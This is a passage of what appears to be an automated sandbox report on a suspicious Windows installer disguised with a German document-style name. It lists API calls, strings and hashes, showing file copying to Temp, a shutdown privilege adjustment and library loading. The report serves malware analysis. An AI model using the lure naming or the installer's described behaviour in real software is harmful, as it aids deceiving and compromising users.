                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035DF
                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035E7
                                                            • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 004035FB
                                                              • Part of subcall function 0040625F: lstrcpynW.KERNEL32(?,?,00000400,00403421,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 0040626C
                                                            • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036C6
                                                            • ExitProcess.KERNEL32 ref: 004036E7
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 004036FA
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403709
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403714
                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403720
                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040373C
                                                            • DeleteFileW.KERNEL32(0079F6E0,0079F6E0,?,007A9000,00000008,?,00000006,00000008,0000000A), ref: 00403796
                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe,0079F6E0,00000001,?,00000006,00000008,0000000A), ref: 004037AA
                                                            • CloseHandle.KERNEL32(00000000,0079F6E0,0079F6E0,?,0079F6E0,00000000,?,00000006,00000008,0000000A), ref: 004037D7
                                                            • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403806
                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 0040380D
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403822
                                                            • AdjustTokenPrivileges.ADVAPI32 ref: 00403845
                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 0040386A
                                                            • ExitProcess.KERNEL32 ref: 0040388D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                            • String ID: "C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe$C:\Users\user\classrooms$C:\Users\user\classrooms$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                            • API String ID: 2488574733-1944624732
                                                            • Opcode ID: 9d094df354a64ac00225b874e1f21de582985ea5e934b42c4bdb5f03e135a873
                                                            • Instruction ID: f8b53dcf82f20274bbdd851e6e7f34b77cfd1224ece1df9e86175f3a8edd883a
                                                            • Opcode Fuzzy Hash: 9d094df354a64ac00225b874e1f21de582985ea5e934b42c4bdb5f03e135a873
                                                            • Instruction Fuzzy Hash: CED11371500310AAD7207F759D85B3B3AACEB41746F00493FF981B62E2DB7D8A458B6E

                                                            Control-flow Graph

                                                            APIs
                                                            • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75D53420,00000000), ref: 00405996
                                                            • lstrcatW.KERNEL32(007A3F28,\*.*,007A3F28,?), ref: 004059DE
                                                            • lstrcatW.KERNEL32(?,0040A014,?,007A3F28,?), ref: 00405A01
                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F28,?), ref: 00405A07
                                                            • FindFirstFileW.KERNELBASE(007A3F28,?,?,?,0040A014,?,007A3F28,?), ref: 00405A17
                                                            • FindNextFileW.KERNEL32(00000000,?,000000F2,?,?,?,?,?), ref: 00405AB7
                                                            • FindClose.KERNEL32(00000000), ref: 00405AC6
                                                            Strings
                                                            • (?z, xrefs: 004059C6
                                                            • \*.*, xrefs: 004059D8
                                                            • "C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe", xrefs: 0040596D
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040597B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                            • String ID: "C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe"$(?z$C:\Users\user\AppData\Local\Temp\$\*.*
                                                            • API String ID: 2035342205-3494801066
                                                            • Opcode ID: d19359472b600334dec94491de2483d8e144fed62e712032587100ce902314ed
                                                            • Instruction ID: bed3c70eefbd60b288d0e49403b05a90b1a02306e0e83ed8d7b57435798b36db
                                                            • Opcode Fuzzy Hash: d19359472b600334dec94491de2483d8e144fed62e712032587100ce902314ed
                                                            • Instruction Fuzzy Hash: 4341A430900A14AACF21AB65DC89EAF7678EF46724F10827FF406B11D1D77C5981DE6E

                                                            Control-flow Graph: nodes 665-668, first block 4065a2-4065b6 (graph not reproduced)
                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,007A4F70,fareafvrgende\Djrve27.gud,00405C81,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,00000000,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,?,?,75D53420,0040598D,?,C:\Users\user\AppData\Local\Temp\,75D53420), ref: 004065AD
                                                            • FindClose.KERNELBASE(00000000), ref: 004065B9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID: fareafvrgende\Djrve27.gud$pOz
                                                            • API String ID: 2295610775-1196040977
                                                            • Opcode ID: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                                            • Instruction ID: ff58ffc18adcfb1e82f863fe631525536c8ca60503d441656b10eafe22cb2dbc
                                                            • Opcode Fuzzy Hash: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                                            • Instruction Fuzzy Hash: 40D012315190206FC6005778BD0C84B7A989F463307158B36B466F11E4D7789C668AA8

                                                            Control-flow Graph: nodes 139-243, first block 403d1b-403d2d (graph not reproduced)
                                                            APIs
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D57
                                                            • ShowWindow.USER32(?), ref: 00403D74
                                                            • DestroyWindow.USER32 ref: 00403D88
                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DA4
                                                            • GetDlgItem.USER32(?,?), ref: 00403DC5
                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DD9
                                                            • IsWindowEnabled.USER32(00000000), ref: 00403DE0
                                                            • GetDlgItem.USER32(?,00000001), ref: 00403E8E
                                                            • GetDlgItem.USER32(?,00000002), ref: 00403E98
                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00403EB2
                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F03
                                                            • GetDlgItem.USER32(?,00000003), ref: 00403FA9
                                                            • ShowWindow.USER32(00000000,?), ref: 00403FCA
                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FDC
                                                            • EnableWindow.USER32(?,?), ref: 00403FF7
                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040400D
                                                            • EnableMenuItem.USER32(00000000), ref: 00404014
                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040402C
                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040403F
                                                            • lstrlenW.KERNEL32(007A1F20,?,007A1F20,00000000), ref: 00404069
                                                            • SetWindowTextW.USER32(?,007A1F20), ref: 0040407D
                                                            • ShowWindow.USER32(?,0000000A), ref: 004041B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                            • String ID:
                                                            • API String ID: 3282139019-0
                                                            • Opcode ID: fc3c2fd52c5859f2fd2362f058ebeec97e14ddaa85c60b8da330eda8cc3c5bb0
                                                            • Instruction ID: e7c2d8670a20ab778e0eeae1551072eac63d4844406393878d1a707f383ade6f
                                                            • Opcode Fuzzy Hash: fc3c2fd52c5859f2fd2362f058ebeec97e14ddaa85c60b8da330eda8cc3c5bb0
                                                            • Instruction Fuzzy Hash: B6C1CDB1504205AFDB206F61ED88E2B3A68EB96705F00853EF651B51F0CB399982DB1E

                                                            Control-flow Graph: nodes 244-314, first block 40396d-403985 (graph not reproduced)
                                                            APIs
                                                              • Part of subcall function 00406639: GetModuleHandleA.KERNEL32(?,00000020,?,004033C2,0000000A), ref: 0040664B
                                                              • Part of subcall function 00406639: GetProcAddress.KERNEL32(00000000,?), ref: 00406666
                                                            • lstrcatW.KERNEL32(1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\,75D53420,"C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe",00000000), ref: 004039EE
                                                            • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\classrooms,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A6E
                                                            • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\classrooms,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000), ref: 00403A81
                                                            • GetFileAttributesW.KERNEL32(Call), ref: 00403A8C
                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\classrooms), ref: 00403AD5
                                                              • Part of subcall function 004061A6: wsprintfW.USER32 ref: 004061B3
                                                            • RegisterClassW.USER32(007A79C0), ref: 00403B12
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B2A
                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B5F
                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403B95
                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,007A79C0), ref: 00403BC1
                                                            • GetClassInfoW.USER32(00000000,RichEdit,007A79C0), ref: 00403BCE
                                                            • RegisterClassW.USER32(007A79C0), ref: 00403BD7
                                                            • DialogBoxParamW.USER32(?,00000000,00403D1B,00000000), ref: 00403BF6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                            • String ID: "C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\classrooms$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                            • API String ID: 1975747703-1640944949
                                                            • Opcode ID: 90026218f8455635aced1ea3c9adb74d2a6e6c4d32214fa6dc51bb2c99e1baf3
                                                            • Instruction ID: 0f1e86156467dc572bfe90fa2eb59b903a3bd9170c228be251d5c9c569d222eb
                                                            • Opcode Fuzzy Hash: 90026218f8455635aced1ea3c9adb74d2a6e6c4d32214fa6dc51bb2c99e1baf3
                                                            • Instruction Fuzzy Hash: 9861C371200604AED720AF669D45F2B3A6CEBC5B49F00853FF941B62E2DB7C69118A2D

                                                            Control-flow Graph: nodes 318-384, first block 402ec1-402f0f (graph not reproduced)
                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 00402ED2
                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                                                              • Part of subcall function 00405D51: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D55
                                                              • Part of subcall function 00405D51: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D77
                                                            • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe,C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                            • String ID: "C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$vy
                                                            • API String ID: 4283519449-700603021

                                                            Control-flow Graph (first block: 406281-40628c)
                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063C2
                                                            • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F00,?,004052FA,007A0F00,00000000), ref: 004063D5
                                                            • SHGetSpecialFolderLocation.SHELL32(004052FA,007924D8,00000000,007A0F00,?,004052FA,007A0F00,00000000), ref: 00406411
                                                            • SHGetPathFromIDListW.SHELL32(007924D8,Call), ref: 0040641F
                                                            • CoTaskMemFree.OLE32(007924D8), ref: 0040642A
                                                            • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406450
                                                            • lstrlenW.KERNEL32(Call,00000000,007A0F00,?,004052FA,007A0F00,00000000), ref: 004064A8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                            • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                            • API String ID: 717251189-1230650788

                                                            Control-flow Graph (first block: 4052c3-4052d8)
                                                            APIs
                                                            • lstrlenW.KERNEL32(007A0F00,00000000,007924D8,75D523A0,?,?,?,?,?,?,?,?,?,0040323B,00000000,?), ref: 004052FB
                                                            • lstrlenW.KERNEL32(0040323B,007A0F00,00000000,007924D8,75D523A0,?,?,?,?,?,?,?,?,?,0040323B,00000000), ref: 0040530B
                                                            • lstrcatW.KERNEL32(007A0F00,0040323B,0040323B,007A0F00,00000000,007924D8,75D523A0), ref: 0040531E
                                                            • SetWindowTextW.USER32(007A0F00,007A0F00), ref: 00405330
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405356
                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405370
                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040537E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                            • String ID:
                                                            • API String ID: 2531174081-0

                                                            Control-flow Graph (first block: 4065c9-4065e9)
                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065E0
                                                            • wsprintfW.USER32 ref: 0040661B
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040662F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                            • String ID: %s%S.dll$UXTHEME$\
                                                            • API String ID: 2200240437-1946221925

                                                            Control-flow Graph (first block: 4030fa-403111; named calls in graph: GetTickCount, MulDiv, wsprintfW)
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CountTick$wsprintf
                                                            • String ID: ... %d%%
                                                            • API String ID: 551687249-2449383134

                                                            Control-flow Graph (first block: 405792-4057dd)
                                                            APIs
                                                            • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057D5
                                                            • GetLastError.KERNEL32 ref: 004057E9
                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004057FE
                                                            • GetLastError.KERNEL32 ref: 00405808
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                            • String ID: C:\Users\user\Desktop
                                                            • API String ID: 3449924974-3370423016

                                                            Control-flow Graph (first block: 405d80-405d8c)
                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 00405D9E
                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe",0040334E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75D53420,0040359C), ref: 00405DB9
                                                            Strings
                                                            • "C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe", xrefs: 00405D80
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405D85, 00405D89
                                                            • nsa, xrefs: 00405D8D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CountFileNameTempTick
                                                            • String ID: "C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                            • API String ID: 1716503409-3155321930

                                                            Control-flow Graph (image not preserved)
                                                            APIs
                                                              • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                              • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                              • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                            • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                            • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                            • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                              • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8
                                                              • Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2
                                                              • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316860454531.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.316860422171.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000000.00000002.316860484299.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000000.00000002.316860509538.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Global$Free$Alloc$Librarylstrcpy
                                                            • String ID:
                                                            • API String ID: 1791698881-3916222277

                                                            Control-flow Graph (image not preserved)
                                                            APIs
                                                              • Part of subcall function 0040625F: lstrcpynW.KERNEL32(?,?,00000400,00403421,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 0040626C
                                                              • Part of subcall function 00405BDB: CharNextW.USER32(?,?,fareafvrgende\Djrve27.gud,?,00405C4F,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,?,?,75D53420,0040598D,?,C:\Users\user\AppData\Local\Temp\,75D53420,00000000), ref: 00405BE9
                                                              • Part of subcall function 00405BDB: CharNextW.USER32(00000000), ref: 00405BEE
                                                              • Part of subcall function 00405BDB: CharNextW.USER32(00000000), ref: 00405C06
                                                            • lstrlenW.KERNEL32(fareafvrgende\Djrve27.gud,00000000,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,?,?,75D53420,0040598D,?,C:\Users\user\AppData\Local\Temp\,75D53420,00000000), ref: 00405C91
                                                            • GetFileAttributesW.KERNELBASE(fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,00000000,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,?,?,75D53420,0040598D,?,C:\Users\user\AppData\Local\Temp\,75D53420), ref: 00405CA1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                            • String ID: fareafvrgende\Djrve27.gud
                                                            • API String ID: 3248276644-3469630132

                                                            Control-flow Graph (image not preserved)
                                                            APIs
                                                            • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,007A0F00,00000000,?,?,Call,?,?,004063A1,80000002), ref: 00406173
                                                            • RegCloseKey.KERNELBASE(?,?,004063A1,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,007A0F00), ref: 0040617E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CloseQueryValue
                                                            • String ID: Call
                                                            • API String ID: 3356406503-1824292864
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316860454531.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.316860422171.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000000.00000002.316860484299.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000000.00000002.316860509538.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: EnumErrorLastWindows
                                                            • String ID:
                                                            • API String ID: 14984897-0
                                                            APIs
                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,004033C2,0000000A), ref: 0040664B
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406666
                                                              • Part of subcall function 004065C9: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065E0
                                                              • Part of subcall function 004065C9: wsprintfW.USER32 ref: 0040661B
                                                              • Part of subcall function 004065C9: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040662F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                            • String ID:
                                                            • API String ID: 2547128583-0
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D55
                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D77
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: File$AttributesCreate
                                                            • String ID:
                                                            • API String ID: 415043291-0
                                                            • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                            • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                            • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                            • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                            APIs
                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00403343,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75D53420,0040359C,?,00000006,00000008,0000000A), ref: 00405815
                                                            • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405823
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectoryErrorLast
                                                            • String ID:
                                                            • API String ID: 1375471231-0
                                                            • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
